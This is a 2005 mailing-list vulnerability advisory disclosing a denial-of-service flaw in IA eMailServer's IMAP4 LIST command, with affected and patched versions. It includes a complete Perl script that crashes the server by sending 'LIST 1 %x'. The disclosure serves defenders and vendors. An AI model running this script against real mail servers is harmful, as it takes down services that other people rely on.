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| Subject: | [Full-disclosure] Denial of Service Vulnerability in True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051. |
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| Date: | Mon, 27 Jun 2005 01:02:10 -0700 |
Summary: Denial of Service Vulnerability in True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051. (http://www.tnsoft.com/) Details: Input to the IMAP4 LIST command is not properly checked and/or filtered. Issuing a single character '%x' as the second argument to the LIST command will cause the MailServer.exe process to die. Vulnerable Versions: True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051. Patches/Workarounds: IA eMailServer Corporate Edition Version: 5.3.4. Build: 2019. is not vulnerable to this attack. It is available at http://www.tnsoft.com/. Exploit: Run the following PERL script against the server. The process will die. #===== Start IAeMailServer_DOS.pl ===== # # Usage: IAeMailServer_DOS.pl <ip> # IAeMailServer_DOS.pl 127.0.0.1 # # True North Software, Inc. IA eMailServer Corporate Edition # Version: 5.2.2. Build: 1051. # # Download: # http://www.tnsoft.com/ # ############################################################# use IO::Socket; use strict; my($socket) = ""; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "143", Proto => "TCP")) { print "Attempting to kill IA eMailServer at $ARGV[0]:143..."; sleep(1); print $socket "0000 LOGIN hello moto\r\n"; sleep(1); print $socket "0001 LIST 1 \%x\r\n"; close($socket); } else { print "Cannot connect to $ARGV[0]:143\n"; } #===== End IAeMailServer_DOS.pl ===== Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com/) Vulnerability discovered using PeachFuzz (http://reedarvin.thearvins.com/tools.html) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
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